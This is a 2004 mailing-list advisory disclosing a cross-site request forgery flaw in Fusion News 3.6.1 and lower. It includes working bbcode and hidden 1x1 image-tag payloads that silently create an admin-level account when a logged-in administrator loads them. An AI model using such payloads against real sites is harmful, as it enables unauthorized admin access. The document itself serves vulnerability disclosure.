<<< Date Index >>>     <<< Thread Index >>>

Fusion News Yet Another Unauthorized Account Addition Vulnerability




-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY 
patching the previous similar exploit. Basicly all the vendor did to stop the 
last vulnrability was make it so you had to be signd on as an admin to creat an 
account, and that is simply just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnrability this one you cant simply type 
something into the url bar and press enter. All you have to do is make sure the 
admin is logged on then do one of the following. (the first is probably the 
most reliable for an attacker)
1.)Leave them a comment with an [img] bbcode set like this

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3@xxxxxxxxx&password=password&icon=&le=3&timeoffset=1[/img]

2.)As long as the admin has RECENTLY logged on you could exploit it remotely. 
By convincing him to go to a site that has a malicious <img> tag such as the 
following

<img 
src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3@xxxxxxxxx&password=password&icon=&le=3&timeoffset=1";
 size="1" width="1">

That would make a 1x1 pixel image meaning the admin wouldnt even know what 
happend.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)